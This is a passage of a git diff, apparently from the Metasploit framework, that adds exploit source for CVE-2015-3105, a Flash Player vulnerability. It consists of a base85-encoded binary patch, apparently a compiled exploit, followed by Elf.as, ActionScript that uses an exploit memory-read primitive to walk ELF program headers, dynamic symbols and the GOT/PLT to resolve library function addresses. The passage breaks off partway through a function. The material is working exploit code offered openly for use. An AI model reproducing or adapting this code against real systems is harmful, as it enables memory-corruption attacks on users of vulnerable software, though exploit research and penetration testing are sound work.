zA$$F=4YbTZUv4E0>--THt>-qXS7J4J{Hj!`(?z{&5|~(!cU?ibx>!QZf_^~%SCUm;
z#G#g@WVLRjK5X3U8Xv65KdvV!cCwaZxuTq+75ZaHg14SSKjQ-n|E&BukekN*dc}>d
zFayukbn%H4PV2d|UoZ1c3WMX}Y3pX*H*6+wKip$|Dv4T^yKY*pk}TqLndWrrqTlF-
zrvx}w0x>t#WKX<z^uLWNI<W9X+z@28aV}_V&ilxL@IkMP!MEufhqkoNj^L|L#8j1l
zUe!Q7tgug{AW*FV)0i;9oV<s`7y^VG9Noe7Iawo{h+7NNW96;Y%|v+QvDU-8M!KZW
z%tgwzJWl#7%wxyxQn$|KKNw#|nkE+gT9MMh#Kdld7NO1cFBdQ>Ml8e`cpk#rROe1{
zleV~RHxit(dR$@j9IXumpGQjE*q~SYSEXlz2BDzcj`AWV9o(HoMQpW<o>|!n42N@D
ze5&<HqJo}KbwOgpx-XlFtCfW)WIzu4Rq*^xjsMM|>;`xXfyn*P2rDNu#V^*E=Z>%?
zlHhW<Xi94i^&GSb0O&-g0ZU$({})k~Q$tMOV5T=3S)Lcuosu;&aacdIN12h!Nxl>3
z&AwHh2^!utUsHBXy~YBf@$uF|c^bi*AKT{d2LLG`E&3^_KcM}eNnvQI0hkw<1ow3)
zgS=b6?8h1ISRLA!46k!N4Oi~BhvYzXc}%|-mpQKcD`z6~AO$@yiMPF$Cl^7~z9}|z
zYi0MFuY~z*!Hil7S`**GO?9;E;Tae(J~=iQ0cGC@mk@~ILvU=Jl&mv&b3n}j5JC-p
zkRHgkZR*(TQ(PAV-+u=;=a(+D?SqgMBP}I9j8G&M!)(Vd>_9SRU0irM&K~DIm&ESO
zRW<e9atu?P=lOza9fpeR1Uk!&&2<fmI)A=Almzv&BH3Z}N`M0YPi$M2`Moh`Nox}3
zRXia%V)-4<(K_m@zqo1I{(U60dDqC<r<a{FGCrnWJ9x*<8A9^V^3CX%Rj50)H1mbG
zBlzTr<o|s3dNF*Pu6;o2OR{>p!k5nWZtIB$kkA!_MmBb7&|onapK!<OQRjha*hR!G
zJf??YqzG}owybbS?pVa&sDPDMyt|}COogqYz>aJ|%|Qd41syt1&q0&WR{yQn)9|R7
z*fL4Cst@OZ{Z}0>{??VrYYTz=M__@Se$fA&_JGul8^Ouz^CDA^O{@no&ktj@g7J>j
zqmcOgh8U}_M%;g}kD9Ab1qpL)Rgq9-Z{G^w1+E-)is>dh^b2C=<z>2v$S~?57-@HN
z@E{w-5V;JQnbWY%fI>9m_wH_~QjRW&qBPm|+C$n3A29GrX&7pgAOaI@Nj5tr_R26E
zK_Kwb_S5#WjxX5s%9wIybzBzJ%DLqVygH%Uy$4vn9H0&SSdOmTP}EytteagM@$c+;
z_z<`tu)VnAt<BZHT#C>$JZ}zbG<TvArX{uBt^=;o8PTXn#W$bgE?&FPP+(5N8ziNk
z%(yfzXKxgM2A`o;NIo_da(_zs0(KX;UD(%B{%U%Q>nw7#Fu;?tiQz+A(TeJvr(<HL
zFbG-O2=Z!fdz<^(_oaXIx+wg;8_3H(O}?FEpaUQKlA%HbdKpBt4a%Y)^Qev|0r6-D
zT#Lykwu=T<H4eo>@=${NFe|vn3R@G98PDh4rlIXHDX6P{)Y-^-3>tR*phV^XWZu@+
z^NklaE+t0-x*_jVJ4hO}l8tu($hvv3EY6|9k`G%<Z~%+ndz1wMbW2q`+_|(9Sf{Zc
z{%ADgYFe$Hjee?Uo=h*1JS;h$bM!yNkAp0zW<j@<SxP$YrC|Y3d;8<lZa&p7c*jf{
z+wyAPzhM1;eM;zhtZ<8n0+LXD`xX}wTf>=A=_q<eEm#hfTjZveVD{smYll6>ynF4l
zk?y#-s)d-ru?onE{j35YIW1BY*JRqNb%7x5f%Bb`jDC-_AXNZU7LSj3BAy^DjwNIC
z&*t~7x{{qdJL5D%0k`Aw${ir!DYyGyMK6)ULRd6r(T~1uyo@P<1OK%!C5L71=E5!&
znc-NJG^JZ|QEiEM4nT)h-SNDhc=4;?+3m9El)WR2San%TK9eJtkNG|}V2&IXFHSIs
z4>4L@R%Hs4r1T}p<a}Cev<<)kbS*>oJuluuRVeOVX%F}8+w}%qxb0A^&+<d4cVdoh
z<hG_$bEWe}C7&fsdUh35F_n3@+#xZ1;0JqcbbrVHBNJBpoTY_hmXD>u#fzwl=!r@Y
z2-HgQxWTE@bEK5w&zt2trH>f+i_D?x5qv>mw!clt)%Xhq#tlw%+$c^&J@orFOJ~pF
zYauTY$+DueO|_|6Fd+o&;zS)M8tBh*%Vk?NB%ui7?2O0TdrQf!vElfP_*bd{;e=i5
z2DT*ff$EOsC90*4zcDBdeHG#iIhD{dxHLt-WV@T!hnP`LC{m=Qe&=Y$33+Br+^BW`
zq<!y^`3d0UZF}A^Zu|8gyGb{u-jT^g3lP%IS%sR)=5qp<wI0~p_ZY`NylgJfgUraj
zwiN2%C{_DVe^WB!*)7TBh(Yo1_*se&th$?M)6IketlB+7-o~qs=J$4*Q$7u_ebqd{
zShO=s0=@ogQ$*Bq8rpBUST@bL(gw@rv8?wbHDm6tkXU2389;UGyNcy?B{2Bc7{E3>
zQF^sYrj(z>^7uPCt#swDIga?`BT064ifTH2P<Fo{<g=)Q^lXbmFj)8{v-3}pAd3ZX
zNs<)N?B`#Xh{8gp0y-o)2kgXeO^8Mk3&xgMf}2zR2`E@PE#P0G!88ohef0p4j{YDb
zIw~Z|QEq;eV_;r#7o9|_;SZ%^Au3FAcFfk=s)-VUpm_U4Ue{)KbRKHam%%e^mE>0n
zV|VUVa=Olla<Qpd^+Dn%8)H9;zi)5zSiG3~aqZT#0(EWW=cVC>=fPUA_n9hG$5x?0
zI<a2MMAkjApX8?gomiWHI8q4W_<#cF%iqnGfDJzR3qcJfx%RkSwG^UB%2H*rYOtCo
zu`zR!(VjKxkn^wB0`|$tm+a6X$fZ85P5cq6tBJzA%gcw8xNPxtd4b11H}|1VF*9tC
zu??AXR9({GO%Xe&>T~V47);;rETK~57`N_!V+qS9=YK*YlE4Z#i>Zvjj{xou^Hezl
zBIHH4lz+gy!7G4P{xQ9f7LkG#8k<6XnNZ;&Nnfd*yb%)`?@4NAbARC^r<FY#YI{+`
z8^tloFRx^`F{)T$vyM1)nL@`@qMP}e4xgEV?P;|fY3b6CvSJOQ#>A>Z?4Q4fIofO!
z?>vwy2XI{Jf@qM4Iu8d3Q_?12>Ozn!V!-OO9cBH@FW{di2NK?(CG>I4VeELna4WGm
z(BY1NM%*e~Af)D?{vy2E@3Ygex&KAnw`wd}43+=R$?dr(TJ%ReX>R9@PJ+S5w7cDE
zxsr=vJQ=@X%?Z1Cq*QAav3N>Pt8k28?PZLboxetR+#{5%d_M{CXbPs|WGvHT^3gpF
z`vB{nQ|Blyr2N07E3lAI3mM#JT!*LW?sokR9>x(qtt&1Hz=DDjiaJ>!{WNsZ_li<%
z4Z3A`uQ{PJV6}{rvi9ViZCOt619LKZiiGq0)8lyJ9&+Q~{&jL3M{sv|Umbh&Wkm!}
zgizKaBQ*f02+|EMM(7gVGpa=c-^NYEa1C?KFM2qA%d6WwHNIFO!EGf~GOlH0N)bk^
z7eZP}#wz!EEA0VHBD$w@>*ZE`PrnJNJ-fy`@zI6677CVe!38<%6v)~1$eILNn>)<E
zNrFWFbaC)EQ|1D(#wV)gh3PxTYc{n`o#kKKFG3w^1dRMiz!X;z(;o!8Au~14#+<6g
zloMP;k@?ON#*S!?Ct&Lx=Gh4C;M9zb!T+OIMRGi%*#f*{WS4!lp!YWn9Vm;0?GbBh
zSUAR6cQ_rn4In*pCm~=rjv>)A*qB=?)r2##st2(K&vM!H+(FXkCUNS=5+1?bT8U?p
z{Dl&4{TIyf@M?`XEokQ&9?)g8jKD!CNguHfBcYC}l6TB$6wl6M$byaP`u}(GIlnhX
zmzKVRSA#eDC}8Ms|6b}5|I1oG>}bo=qR=Kk`mXy-hAj!mzV}_|$?Uikc(IH1RH{5}
zj)Bph47BjKDDrbf-n}}gY&G()^FrT_{<F9E(Pb_e^<W;j_{V3%2s6Y`u#p;NRIw8x
z48KPjQc!g?Eew2TRmk+wEav25eY)Yc;6sp8prLhwd9+%mZhi#iN_F_I9mURmR9tcX
zJ?UOk=5E0zN{Ev4SL@We_v}+&^*1!RKZK5g9xY`b2lUN)fb`%K$h3Jd>A>X0%0fs9
zqPzDhZfD>1!I4wMP%XZTp$S*IvG>$PC%8^oUR3c!3wJK7LJ3&(oz`+iNaiRAXW&|&
z`b~|S?Zc*qeO!=~<lDiT<7d?Ur*v|D_t2^a?zDa_)OmI=Z$L2P<6ol75a=|6R$wcZ
z`f<7guku9;e&1jIkGt2#S2$6yP5jeWqsx}<uqHE6Ca{pc4WfP{G`<G%Meh|15lMor
zNTZ+Bt*Di{v`UFJlNk;evwDOlPHkA~IB4*GNN1XzD>s-kLW)#M2u1@in=PB2@Pi=$
z;PTBQEt;cilZ%Dsl6B#J<2ox2nhqpy)Bk{<2)o0GC?;O}$S0ip7wtG$S<EE1wxs6C
zHt8|`{%J`gI~vrr_?v+XBR$k#q6jdI)Uylg4S$M*@5-uKFJdLqtM@j^=&>2DpT>c6
zzscRLJjTZ9lN?`~Ues&)I=nbzt?DkO_-v(0nv!>?YZe_p2-=(M(WJcRlhsAeC09kN
zVY_D|nsCGScua4iqd^^Z%}zN29%A^?$+k)j>lg{z#Jg_%a|8qN5Ca5-tkyg#tIGe%
zivwsGdYYWc;%)KdQ~E9olTyzfi6SV(&Y`;h_ak0%c(Fqn$6ax=%S;>}+tfg;vQ~Y|
z!~{+9|3#mPx#ctul`!!K7)O939=a3T`N9dKTjjLiSJ!Rz6x>i;WEkXA$8=o}_T`m5
z6_Z%DOmv5AnAM{iLLq?jhS^4;R7l@@PSL|ktK(@1z|EVX+A@k%<h&ig7LbjDwOB7k
z_xM9iQ@1!t1gD@_?R<V{^M<kBRW%_&ZtgZk<8y%QObV_`8+Az}>{o^J<*1V^tOn_X
zGHS!HaordqF6Nw}hGqSkB<qbb765$M-ldZHesS+FmmbZFgao8|1gLlSdiuA%4*tp%
z&%!(eNOin$`kIy=!$}x_cRnzn52IB{*B43q8vkg#p9X1)a*C0o(ppWfWDXv1`0QBh
zczI5qs<X=_Rc>@vm9$xXn*3Sp^ND8$7u^TJM+uoR&VmS;Vr44QePvJufGBhZPC_?I
z$b3~o`04i|1rdL%=W2-JgJMiI#wo`FT6%O|BYKOA=Mxmor5kg5-}4@7J5QU-*w#gn
z*`6>x#qLAbyc&2<n=8GWWUIMYg~kT#Jpmt(1Zrlfw?oqwW3^kJ2-k!qujOlCVU-zE
zb_l%)=u9uTRQII=Cn*SQ;fdi2<+Vmc?_+qf+VbzMV8O6DwWmjBKow|!X+|-oXW>lc
zT-ZPNpUNXa_L%1-nbJ2-VC_=9c^bnNO&D7!vD}Osd%Y#PYuaDLDUM#-m`Z<0pIZ)l
z^~nbvuMzh_wv)_S1>5Y-qg(TzhT@S0;-p(-N2zMvOq?A=m@%ErpWr(Ji*anH{I9_@
zTptM+KM%2Tz|2y<HD<6clc6l#7l(#F4Bd(0#R8i5#FZC{0W;6_ly~WbCB?Z36IPdK
z+HawE$+%BJOBW4~n!`Oufm_5+ZPrv3a(KGD94keW0KR>e40(1t-W-axw>pjU){c(4
z8`N>UIr@O5O5ZbIW?F}z0jo|Cn;kw^>QI}L$q|fx8}94@_^j%xN&qL{<VjeTU|C~w
z|2>&+0g`rn#%mX~k~)7-)>zWAV2xn_0_-uo&jA^Xr|jeYBQOnxRXxO>U8S<%O@ekg
zJ#HngEKE{4b|x+&Yh_xOMm<(y57qC6k8G59xRz3X9;Lx0)nKmL4zJIM8%pkNF`8R{
zWk(b_S9JC*tOQ<J7KO3_LjK%)$#_R~)Tevp_dlW}BBzHEBAQV!+GoMhWiEgs|Dugk
zmo3NM(x)lhpcLb({OZ<(l58lkXwuAHCIaYj8z^K^CK;=W;~tMao?%(q<l%lvmz^nb
zz4hzTBJ`^!ZJ<7DIk4+yMqMj1M(>FMOc%50h|D&M$??gRU}ti(Fb<C#R4)M*PX7Bq
z4oZ0pp#7EvD$gHL;K}{!z&6X58o1s=0L4NdZ(|$vj|TuBKKL~HAQuM*n=6yD450O*
z8QvL#=`50kDpYOXvB5*<(G8^}L6Q&jWyO49?FQuzgC5HBF(04o+*#-071V(=Q&4~%
z6rv?`T`kIRzh}lTNf>}Tilkb7W;J|q8A%W-P#PSY%IEB$Z|mFzga+{{^b>H9zcs->
z&i$|~zMVq|laBR29@BlrAOrfjNRq9Op29JqxY6-(>b=_60$ADBdF5>AVjmbcR}i^^
zAsiqSn#mH-t&prX?C39;f2z*v-^CyhPVpDos)bZ=*2L8$U+RTutQQR>G<W~r6!v)d
zZ}@jaiNaPIl0~eRiUb*`Q-N;;5$F7O*K~XeUuqJHBM`1innEdI3O*+jJF}rNnfE`y
z1MZtQI`tQ2cJUpO;*htP4O}Wp^e?2UH{id-lJxygWVKL|ZAL#R!E#5zbLWZ;oIOE^
zG;&0leFPM5>GPQD@_)V<v5az(uywrzrRbyJIyxL50b<J&L@7(6=Gv1GfLe!%sOh#k
zTrwMe;Us;V1({5b5A49mlANC8uaR!mUMxiKzvF5d`z=!rBa6=&j1L?xZ_F~<b~RFC
z@$2=BbTejEUZV7pl<KYYyA&*BhM~F5Q8BSHze7-?hOynH`<IVe_gz8f_zs>_F5p{v
zxO-bcJtP{*f3R`Piqznhv+_f&u|}(C86%FyAKK6UWP9^cw^nRI`9FevH~%Z$;t?f|
zM+<E;yw~eU(Fq25$7Y-Rw9Oi0)mP{@e~LL;IRUy%896Di+V52pfO%$T5-@W0mkJmg
zVy_QLl}}AOxmq+<Y#PHQR@+YN<u7pw11UtIe0rXGUVf2p5ze~(2|yq*l8MOW-i)Ie
z?j9Pi5IxIhZvTq;&?RSHd>X~{=yq!QjD={tN;{HAFPY#Asa>s;?i+}3H|h;j^z;x{
zxeZk?ZctXE74Npgs_$4UCA+N7vgB}hc=W2o6KVpQgGB*1Ati$q7+y6Ol2((o0Tufx
zpIH(q20k3WlC}ooJN^)p)!OUpay<GL?yff1s%x1Ll}+bt`@U|GW380qP#B4lCKzbA
zpE}3_1b*u6Aq%OJsSyHj36WWQvNOHO-1=mhLLOe>Y&6>)!(jjF_!WV|TY97;G5uGZ
z`mveM`?F{;Hq^|PX36+|wAUGryOqUwIUflTH9?Z&?i>KKvsJX?IXFRl$c)c4xksO)
zlPYTW^v=b?g6(*;JISo(+5>P^z*<m|lD36e%KKt-i#dS@GxF~>8_<Um3+$A;2e4h?
zyOAvn;D233<<_TSYh}z=8|6Qgn>UW6bLUVWzan7a{S=PdBa}z(Gx7&5c?>86Ha}XX
zLWz1Qcf%MdM2?x<>u2R9t&7h>yZTxF(@pwQ{@x9ccBK_j0!cl$4S)aFCrz66#Zz*X
zrbx#nVr}f2tMll+<i_ixar8H3Y;050vaG+a`uia?Cs-D&Ry3T=yBXjC$C@caq*<l(
z7n{;q%MQ+u8GU$W>bvfw3{sT++X`MSZNl=!uPWke?K)Hr{KFisv}bdn_Y#uDk^HuI
zD^5fRRC_`-x7=Jg{t7}}2PEhmKH?|a@Dto%ehTr=eWRXj57`;W<LBFehG|}Y7jRa0
z89f)8Zfc``h{C?J<|Wqax(-En#{sU}&--Wm>V#p4wwuy&JL|H;ATTj>)pNb&R>2S4
zr#6t;nmQNLF$d&Z*`oZ0LtJduAKDf$+7AOs;O}T(sG<n%{E|soHD1l4OJ6wt<XC5R
z+kOUD8?&eT7>jB#)Y*pA89_YfCdkfr!r1iK{3WwkN3{Ulm^GD}FLh#3k7flTl0dl7
zio7x05uxRC6MAUP&?}_Xwa1`~l&Fsm5`saErF;MW!sr`;YcWDHUdkLFNyx8_?5dA)
z(9p)(u-9nL@8aF=5p1;@JR5&tGGRP%zk_Ilo$(M7XXx?SYVgRDi`<GD><rK?aE-o*
z;=}-*;Y!EGWTGVwZT;(^lipjh_Z*9Z-BgGWgVQYGM5xZn43><w-NctY*G-;5BhR!^
zQ$-ta_^o4#=pGF7s7iL7nXyA%+!%5h8k!`gm7%B&@gR8=%$jxy%#KDruAq;%l*vYx
zO|S6hv3B%@HFzo+JIDRPvg<3h`DsqhEDdL^5@pa<t8+x0?)kSNmD(Tcn^6m-(x6b^
zG`va3^laF?BL-lgb2+qhBfwvK#H&;*9L@VsrD$D(tV(!n#+C$bu6Bw<fts&Au2%I)
zfKt3l(%Ew*mTm47Rx}S<S-Zar`93j=3raw+q|@20CKC+5oX&!YOvql4MT-;q+QHKj
zd{zz`is3fQA-|1HE7~r@$4q(Tw}kDOA~ef2)G_g-I0|k#K&Smqxygb;U!b97BMA$y
zz8p~Io?2e7Y{@q`kY_vHhbiIACx^rXJJjTt4`;XvXWA<UDn`x3kSCu!F4+8`FJdxZ
z7tW4=uG5V~F;^g|o}#QTDlZ75(isWt1Da6cXOfkN!ns0m6Tqcg$y#`G!2$*^RU~=h
zmEsk|J(gqtJ|b{2WB(h3o(#CQ>D+woBW<0!8#qz6IPib{YPsQaDxQj#TlKDiLfsW)
z<!oo``QI5c;scDI`DWCS2X#0*XhX;rvMv1$1hOao#lL~4n|6uTn29|gn?B5_Vv_nu
zP1uoy$7+elD`nNrA}G7;=3~uVpeecM9YkNxv)6`;GaFKbJ9Ihh?9PRkd0#(joJqYe
z{xEX}X-FvZzbBYP2Q2%FQI_wWHMHSp{Z9<iiT9ebx<i4%IZG9We{8!Y^Js6cU;M^E
zbet6Ov(s!kYcpyT-z1ZcL&0;VuV@WI5#lmOW@VBu;r0WESY+RhcT)aIWFVlUXxVZC
z!VwO=l)eE-YDfL;iKcas-Q2}G9<D1(&1<|J56RGu=Z9ddLnR@*mMY@{0t<m+YML>@
zHa`gsz?Fzde6s;PU0=7kW_b^$6QTG@Y}+}@B}`W>=DMD%hvdg<_MoTL%&9hQ)g{>g
z`3(Zj<jd19?E#fuvuN~96BF&lH>D!Lwuv>ca6-dAG8%pop)}g!7Ak_>^F&fsN_>dB
z3h#e{M5plsD6gDir^0fH73C6J)~q~UyU*0&!t11ZHQ!?THuyu_1aJ?(s~T03UKVd<
z`;?LWgmN!jCA$tnz$g=1;1dZ|e}H?-Zyx1+Q?l1ZUkgFd;kV2E3r`&31I5rgW%Eu{
z{(^aFOxlATM#jUDb0|obhjAj7)SZ1!<c~h}!@ntk-10F8&v7<buvP@X{LC{56#JAd
z7*7o}V-T9w-@f^>Z}T$3z6lDA&pbDox)Y_qL4{tstcqfgWt6pM6Se}~n?D=qZ3O$Z
zJ>39;>eCQ{MSBXAe$An{5v=2;bbD%a*HTmhAk;t+9<n57wj#{`DJIAcoJ?TAr&tO3
z6$BN)0a}yn6!e9hgU{{9k&Mp1D$H_<s(`_5B1b*LZo@DJiSaVW91<nYigAf20@eoE
zJ+?3l;EH9$$(~UF8S4z~h%p{2x7`SqJ$iX5TSV%j3qKCUB;2S(5KjqAWWoKwf+SML
zv9TNG#?S1+uUPPlRoLs!|CRk!p>}x=t8%ACCF?M<Mr}_t;xBj^Hp*<jhdLIAA@w_>
zkr#Oo`)ATKR0AXxx*(Sd#R5`&NP6DIr+4en$-%dA{U@x`K*v`KQS&9)x}t?@;z}t(
zzEeLgP0CWusol76d0~tciA5x<ui7C~6PI@PgDtFCMJo(q0sC_JW7}k`5<LpxrVhA;
zAHKC&S0)t+0A1n3N1_GhuFjsric%G2#MMiMYQ0o_^U>eBFBtXLeP=R5ccM+m1-2Cb
zv_eumB>*uJh})@WsF*RDneQ2aO=6{1$5TuNH}fYC1nqob)C7W3`R%#&gyl1Dm6wjb
z&hs~AxDgwE2V>vt4GPT-oM0!{Es5==riulVV|qg?%XB|T@ctgLqjZMF2_L%x_Kn4o
z;4_2HWdD<T_gP}QCuf4{(wqBGqqu@bMeYt{QMWi<K4HL;iMtIq#h#At`~t2Ap^4;#
zr)@q2tiBlt`XpT0O%zU+&qwm!N#6697rI!)v{eM;Y-Y_*EW;<Lv$9O_4WdAE2Xpu%
zuUcA`kx-}10KOc7HLKUPjYTwR9=N8`4?UUZZNT!exkAm5-GzDutVmbh)*3o|{H@Kp
zo8UyMOFGHv8>Jeb{Pk||`2@RoX&0s`<)C44#Wtl@aZRQH)R;LFJp9K0v^mo3u6fJu
z3r9%%Mo$vn3}HHx(j^XX@r*0bv}3G3+OE93|5OG?DENVu>KC50lHVDTW9kT{DIj2!
zbz8QK{$8(tIF6+&PC3Br%JSynSzsV$18mE-fMF_9x80Xre2ENVldBSr)hk8bRN}Nj
z4yGCvf#gMAL!5zV&=V=y-^KAK)N>g3ku&MCFtW$4+O4fk)h;|fBd@5Haj*FeDg@W7
zi8Z=t=SB^;RG9xq__RfGsd#qOSGED~CWxeiRQuRh^UZbAo9LJ(+i+NEWIv_9&0u$;
z4Gz};xNwj{*4mG$i=-R0(Di`P4C1!jVxB_lVkaZmN4#xG-0{}rpT-rv6V*z4Q#;Ju
zF+9uc_(}8Q7q<F`&x@?J+fbhG0??q|BUd5Dl$1LtqL2gMq#{SNT1pL*?G-v&LT7h(
zvI|gGQ+A2KoeXNLVh)e$mo0SmlRTI!yweUm@o0ioLqt^i%wQkUaNB#C6WTFU>a6^Y
zF-ajDavaDPeVs;ubKv%8oc^*s-OK8Ls>FsGu8EfBm2qhUi{MJI_xY~czdYSvVKZ+Q
z8nA)*VsjQIrd;)^<VKQCL@P{nX>@V>KE4U7=EF}M4Vl#4RHZ=tfv{B`FrGF`!4<f%
z{cys0e~p_SW@})d5@0atkU8o$BQESb`gj}cdE(e&bhdgF+(-%gM83<+FuU?b&G>h4
zW934NM&{F8)%hC8XuJQJ`s)s>^55tZ;5ez1KF$tW36b<FV6VDf3>xER;>*V@7x18n
zc7r=?DnKn#Y9UIotM$dD)O5qhXia0GiU8d~=tc^282SA&Q5Z8gX23wDwEY^bT)@8D
z@aYToun0XxT!AAyKa<647TuDw?C8h|YL53lM=sG3Nn{hfd#+y2jM>qV1rWZw^as5w
zDI@547t0$T8CJzw(~#KL4nc6i=WZ}E9@TIEi+M;x`+~}w0&0-3BM_*PjHhzpd1q&V
zM`$KZ6<rgO12KUI+A9aXi&5`0U;+X9WKu8PO@Wa)9D1n~wJ+@rbm75HO{|dx8o*!c
z%SZ;ZRl0~h@ETQ?yrLu3b!Cr_VYr>OeUf2RlO?2r@&~G@=QI(#$0)m3q9}lZ-}{E<
ze>m{YPvYWQ-C1od3BfkNfC8!BT?M5|M<&#}<x}p8zhcu<7Xa`4tPr_<mNoY?Oq1A9
zmF3wmo^9tSwCLgTSG4&D%6!Ndf{%g*+N_oBA2fX7R^al5`(;=)u3$OIS?vywMMsT*
zbPacpS$kr#rUm4b^07!g5w~aQ{Dk@&xso6l{WpE;a_Hc;`HMIA!f}Oxi!_k$mwg{^
z2@*FnY^<?em1P|#ZAat;7>}uacMO44#rfyCd4wRv=zzQ@Kj;aFLUT&~bL45IYJ0hl
zQd8VB&=J_6mdJof0Fxy=_GS+ien^?J(M-%2ry{GSjm{4Ljic6p_kLo0sH7iPEotXX
zCKuQ97zhys4uRM{-LhAYh1hTc1DF35#CkS2WptydN@`$}bW-m~M1uBEq$#DrU>iea
zQ{j1)to4+N&xYjax`4uGBu}80db$)a-6uL`VK6Q4WIYd-)q7K{raaGx>{(jt8lv4W
z;k9bzOId~@24Pky6(JY&FrsEU34}`7_t%I}37<pHUd1_Qoj02Bu_q=~GIzxU`a~Ks
zgns#LP4u#I&FE1ajR6c~?_9a;YKRPO3_(=G2Jp_D3M)_1nQ82p&UBN;_^ozl_stXz
zdh?UB4eg0tR!wGlLd!`9T{A)EC%{p)wu-pLy6&_^AJVkNwaU&ypo~dPKhkpTPJXan
zw_R*}Hf-fP-K$|7#S0mwY1_KO8nP2x%|5vCmY^Pn$~^CqHHnF2a49@VMs3?}HM_Kb
zh%;`jF#?GyL;NR%^hvbo?{qwCl>T9dK6<$@nU_ovOkQX&U}K<w8oU9yNanPwYDRH3
z3g#{W8_vEBy(y>wE=TN({BFp45;Xl7m~0tVb`E1C7VrB&CiOm^3&aPe&m-$=2q;42
z#No<KwNK??(15^s;VreB{>$<BOSpxyyBbLje?lg|JAJjcbR~FyerHk(PZJgf+vtF(
zS@f#cK3_U>p~29quBt|m3>e6lLslNy;@f!}80>7cevYvp&<W*uDJD-=3<@=RfB~NR
z7&+r^IABg5&l)TDyTjw{ve&>=?nC)iQM`Vm!j4VPU`LiBZe~__(?;mF4F6b%z%ZD_
z`N@f=lQ6JS%hq`4cH$2ZEksX2vFdbuMKBLhQspM4X-!S8YFiVcu<Se8m$}Kv)hh$O
zVNTt@piz{ugeSP??s5R<G)h-2CyF4Bl}VtZ-3yabs`qDAg9wtY-q8hc_kB5d&7F*o
z1SogYh@8IugPhMu#$il!r3{OUp@bpgE|OC~-mtNr>to)B0+!ITA+VU|llMeWO9T8j
z)?-g%XMcOSL!VO{<<gLxJY9&s)mWVFc8%ai6>`Urk#DK7x<mP5oy9884sBbg)+Y6_
zQl8q@H(ku3_eO<z<%sIBLr#vNyCI<wGXlZ5ep;vimmyqe+9w0!LHjm!Yqh<TdwP=Y
zH-ue<(n43Xm2=e5R60spUyanR8;LX@QQ1JS{r%SIGM}YnRu|kaHurUawO(V9X5+E?
zZyOvAQ1&c#d+jYOKX81-FK}M(D>0e0u`(EcVS6U5YD_&!eW*JC+A3nTTfkmU=O$&>
zS6F}*P&kmBV802ypJgep8tj&mYX)eJCF<Q}6A3VVwpNxjQK8aFz)`}U7Pe61MZ_#L
z#y7H@!Xzxdr04NiTn_MKLxP39E~`Jpz^8-i)3DVbpx#SuQM8^mG=Pjdze&8IRJXL|
zfETrt-o$AO@Na<RLp3>DoFVis&XC<kl7fa#x1j*$3RC!8|Ek`IKZr?7`5MF9EZ!l_
zvV;hSK+ic-T=Au>eXzf(W-|MtuNx2d$q84Ak`u5+8U{xY*r|KxVD-}rZAn?;pOikJ
z6_@n^Ny2?@hV?TvP2mcEMkwrJR%qj|Lo_IalnREB#l#DoW$P!!6A+KX0SN;<!doc|
zk^&!0O%vbt)ppR$cnf^mBZUMWAT666G?i|%zCt))l%Cisu&xnCqoUEd>Yz{v$|T-i
zMWa_+%0XX(>4U7@R;uOgT0a!2+0+4o6b$^6c!#+$E>D6%YYWZ8)xXE1%01eF40-Yy
zL8-<64A_Bs&(T;VI?wky0(XA}iI<Lue-Qc_JRDa1{qcrl2*}U6-xdljgb@e(8OSk0
zZV4N|p8Ng47Kr-eduhm+hxg-`NZj;Pk*O%^IyY%Ug<}`Q)8QkC`+BDjS<t3sv=2(j
z;&NX=c{E8<Rg48fPKa?Cx^vi{hzEeDpb<h%&`5$P1-KezQ7#)}`hCbeg1NWzkdl&e
z8q>@)V#xLnRgi9oQR`5zD3o+CPv)+%epGuC&wTNa@lde>mN<SBS|J7<J|q{cMN~j$
zgU4@%86I>%pt?QMfns*d1=B6j%aAvgw8~f?AS9;H-NsB;x&%sHWPF=@;6mYzp@$Yr
zu|Ghxy|iHypAGrQ1PjVV8^}wq#IxMQ_cM^}my01zO#?vrQJl2+i*P!r3Cl*&OSE*?
PvmJKbDF`h8{=;<bFe#&B

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2015-3105/Elf.as b/external/source/exploits/CVE-2015-3105/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
